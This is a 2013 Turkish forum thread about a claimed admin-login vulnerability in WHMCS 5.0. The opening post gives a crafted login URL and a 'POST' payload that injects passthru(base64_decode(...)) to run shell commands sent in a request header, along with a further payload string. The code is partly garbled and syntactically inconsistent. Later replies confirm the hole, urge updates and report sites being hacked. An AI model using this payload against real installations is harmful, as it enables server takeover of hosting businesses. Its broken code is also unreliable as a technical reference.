• 11-01-2013, 00:03:30
    #1
    Platin üye
    selam,
    whmcs 5.0 sürümünde bir güvenlik açığı mevcut, ancak 5.1'de önbellek güvenlik eklentisi eklendi.

    http://site.com/whmcs/admin/login.php?correct&cache=1?login=getpost{}

    eğer önbellek doğrulama yok ise (5.0 sürümünde eksik) sayfa yüklenmeye çalışacak ve tamper data veya benzeri bir modül ile POST_SESSION değeri aşağıdaki gibi değiştirildiğinde yönetici sayfası açılacaktır.

    POST: $post(login=1);passthru(base64_decode(\$_SERVER[HTTP_CMD]))&login_cancel;die;";

    PAYLOAD: $payload = "login=1&title=1&execorder=0&hook=urlencoded&r edir ect={admin_index}";

    şuan için olası çözüm olarak sürüm yükseltilebilir ve admin panel yolu değiştirilebilir,
    saygılar..


  • 11-01-2013, 00:35:54
    #2
    Ben guvenligin duzeltimsine haricinde bilgi vermeyiniz kotu niyetli kisiler sistemde saldiri yapabilirler
  • 12-01-2013, 00:57:59
    #3
    WMB
    Üyeliği durduruldu
    Evet bu açık çalışıyor malesef, herkezin whmcs scriptlerini update etmesi gerekir
  • 11-03-2013, 12:29:25
    #4
    Platin üye
    son zamanlarda bu aciktan oturu hacklenen arkadaslarimiz oldu. konuyu guncelleme geregi duydum.

    GT-N7100 cihazımdan Tapatalk 2 ile gönderildi